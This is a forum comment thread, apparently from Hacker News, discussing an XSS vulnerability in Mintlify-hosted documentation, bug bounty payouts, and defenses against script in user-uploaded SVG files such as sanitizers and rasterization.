XSS is not dead, and the web platforms mitigations (setHTML, Trusted Types) are not a panacea. CSP helps but is often configured poorly.
So, this kind of widespread XSS in a vulnerable third party component is indeed concerning.
For another example, there have been two reflected XSS vulns found in Anubis this year, putting any website that deploys it and doesn't patch at risk of JS execution on their origin.
Audit your third-party dependencies!
https://github.com/TecharoHQ/anubis/security/advisories/GHSA...
https://github.com/TecharoHQ/anubis/security/advisories/GHSA...
Anubis is promoting itself as a sort of Cloudflare-esque service to mitigate AI scraping. They also aren't just an open source project relying on gracious donations, there's a paid whitelabel version of the project.
If anything, Anubis probably should be held to a higher standard, given many more vulnerable people (as in, vulnerable against having XSS on their site cause significant issues with having to fish their site out of spam filters and/or bandwidth exhaustion hitting their wallet) are reliant on it compared to big corporations. Same reason that a bug in some random GitHub project somewhere probably has an impact of near zero, but a critical security bug in nginx means that there's shit on the fan. When you write software that has a massive audience, you're going to have to be held to higher standards (if not legally, at least socially).
Not that Anubis' handling of this seems to be bad or anything; both XSS attacks were mitigated, but "won't somebody think of the poor FOSS project" isn't really the right answer here.
The vulnerabilities that command real dollars all have half-lives, and can't be fixed with a single cluster of prod deploys by the victims.
In the end, you are trying to encourage people not to fuck with your shit, instead of playing economic games. Especially with a bunch of teenagers who wouldn't even be fully criminally liable for doing something funny. $4K isn't much today, even for a teenager. Thanks to stupid AI shit like Mintlify, that's like worth 2GB of RAM or something.
It's not just compensation, it's a gesture. And really bad PR.
This is very sad because SVGs often have way smaller file size, and obviously look much better at various scales. If only there was a widely used vector format that does not have any script support and can be easily shared.
The only reliable solution would be an allowlist of safe elements and attributes, but it would quickly cause compat issues unless you spend time curating the rules. I did not find an existing lib doing it at the time, and it was too much effort to maintain it ourselves.
The solution I ended up implementing was having a sandboxed Chromium instance and communicating with it through the dev tools to load the SVG and rasterize it. This allowed uploading SVG files, but it was then served as rasterized PNGs to other users.
(Yes I'm still salty about Flash.)
That wasn't the only reason. Flash was also proprietary, and opaque, and single-vendor, among many other problems with it.
Do you allow SVGs to be uploaded anywhere on your site? This is a PSA that you're probably at risk unless you can find the few hundred lines of code doing the sanitization.
Note to Ruby on Rails developers, your active storage uploaded SVGs are not sanitized by default.
Didn’t we do this already with Flash? Why would this lesson not have stuck?
It’s so regular like clockwork that it has to be a nation state doing this to us.
1: https://owasp.org/www-community/vulnerabilities/XML_External...
This is also why an `app.` or even better `tenant.` subdomain is always a good idea; it limits the blast radius of mistakes like this.
I've never heard an XSS vulnerability described as a supply-chain attack before though, usually that one is reserved for package managers malicious scripts or companies putting backdoors in hardware.
If I recall last week Mintlify wrote a blog post showcasing their impressive(ly complicated) caching architecture. Pretending like they were doing real engineering, when it turns out nobody there seems to know what they're doing, but they've managed to convince some big names to use them.
Man, it's like everything I hate about modern tech. Good job Eva for finding this one. Starting to think that every AI startup or company that is heavily using gen-ai for coding is probably extremely vulnerable to the simplest of attacks. Might be a way to make some extra spending money lol.
But like, this case isn't really a dependency or supply chain attack. It's just allowing remote code execution because, idk, the dev who implemented it didn't read the manual and see that MDX can execute arbitrary code or something. Or maybe they vibe coded it and saw it worked and didn't bother to check. Perhaps it's a supply-chain attack on Discord et al to use Mintlify, if thats what you meant then I apologize.
I think you're right that I have an extreme aversion to SFBA-style software development, and partly because of how gen-ai is used there.
Companies will create bug bounty programs where they set ground rules (like no social engineering), and have guides on how to identify yourself as an ethical hacker, for example:
Unfortunately a competitive rate agreed to in advance with a company before we do any pentesting is the only way we have ever been able to get paid fairly for this sort of work. Finding bugs in the wild as this researcher did often gets wildly underpaid relative to the potential impact of the bug, if they pay or take it seriously at all.
These companies should be ashamed paying out so little for this, and it is only a matter of time before they insult the wrong researcher who decides to pursue paths to maximum profit, or maximum damage, with a vuln like this.
Ok, you got "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma..." to send a controlled payload
But regular users will never hit "https://discord.com/_mintlify/_static/hackerone-a00f3c6c/lma...", so they will never execute your script
I fail to understand how this can be exploited, by whom and in what conditions
Apparently one of the other linked posts shows how you can also gain RCE, since the docs are statically pre-rendered and there’s no sandboxing to prevent you from evalling arbitrary JavaScript.
I have a friend who at one point had five monitors and 2 computers (actually it might be 3) on his desk and maybe he’s the one doing it right. He keeps his personal stuff and his programming/work stuff completely separate.
Mintlify security is the worse I have even encountered in a modern SaaS company.
They will leak your data, code, assets, etc. They will know they did this. You will tell them, they will acknowledge that they knew it happened, and didn't tell you.
Your docs site will go down, and you will need to page their engineers to tell them its down. This will be a surprise to them.
Found by a 16 year old, what a legend.
ALSO as someone who maintains a file upload pipeline I run every SVG through a sanitizer... Tools like DOMPurify remove scripts and enforce a safe subset of the spec... I even go as far as rasterizing user uploaded vectors to PNG when possible
HOWEVER the bigger issue is mental... Most folks treat SVG like a dumb image when browsers treat it like executable content... Until the platform changes that expectation there will always be an attack surface
normie3000•1h ago
FloorEgg•1h ago
Pathetic for a senior SE but pretty awesome for a 16 year old up and coming hacker.
tuesdaynight•1h ago
finghin•42m ago
finghin•43m ago
ascorbic•34m ago
MeetingsBrowser•33m ago
I agree $4,000 is way too low, but a $400k salary is really high, especially for security work.
tuesdaynight•1h ago
charlesabarnes•1h ago
tptacek•34m ago
jfindper•20m ago
tptacek•7m ago
bytecauldron•1h ago
oxandonly•53m ago